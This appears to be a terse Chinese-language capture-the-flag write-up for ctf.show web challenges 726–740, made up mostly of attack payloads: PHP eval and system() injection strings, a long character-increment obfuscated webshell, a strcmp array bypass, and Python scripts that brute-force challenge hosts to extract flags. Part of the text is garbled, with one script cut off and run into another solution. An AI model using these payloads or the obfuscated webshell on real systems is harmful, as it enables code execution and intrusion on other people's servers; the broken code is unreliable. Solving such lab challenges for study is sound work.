因为题目较多,所以很多地方写的比较简略,望师傅们谅解,祝大家变得更强!
文章目录
web726
- web726
- web727
- web728
- web729
- web730
- web731
- web732
- web733
- web734
- web735
- web736
- web737
- web738
- web739
- web740
username=;eval($_POST[1]);phpinfo();// username=%00 同之前的web692
自增绕过
$_=[];$_=$_.'';$_=$_[';'=='$'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
传入code=xxx&_=phpinfo(); 不要忘了url编码
web728flag在template目录下
code=',system('cat t*/f*'));//
相当于
strpos('',system('cat t*/f*'));//', '..') === false
strpos('',system('cat t*/f*'));
strcmp可以用数组绕过 下面的是要求输入的secret长度为21,大小等于6543 直接往后面堆0就可以了。
GET:
?secret=6543.0000000000000000
POST:
flag[]=1
https://github.com/osirislab/CSAW-CTF-2019-Finals/blob/0f9de48efda520134bfbe3f9b674ec19a4955057/web/biometric/main.py 题目更像是一个密码学题。。。。。(让人头大) 只能直接给大家奉上wp了。
import requests import numpy as np from scipy.optimize import minimize def main(): x0 = np.zeros([128]).tolist() res = minimize(get_score, x0, method='CG', options={'xtol': 1e-7, 'disp': True}) print(res) res = get_request(res.x) print(res) def get_request(encoding) -> str: payload = {"username": "admin", "encoding": encoding.tolist()} #print(encoding.tolist()) res = requests.post("http://157d4038-cd05-4438-b0fd-632e2a5eb195.challenge.ctf.show/", json=payload) return res.content def get_score(encoding)-> float: content = get_request(encoding) if str(content).find("Login Failed") is_guest();而access_log类中没有该方法,就会进入catch,catch中字符串与类进行拼接,会触发类中的__toString函数,进而执行读函数。web740import requests import hashlib a=[] url="http://381ec5bf-2b46-4fcb-ac3d-38e92fcacd20.challenge.ctf.show/" for i in range(0,32): for j in range(1000): md5=hashlib.md5(str(j).encode(encoding='UTF-8')).hexdigest() if('6'==md5[i]): a.append(j) break for i in range(len(a)): data={'hash':a[i]} r=requests.post(url,data=data) print(r.text[i],end='')
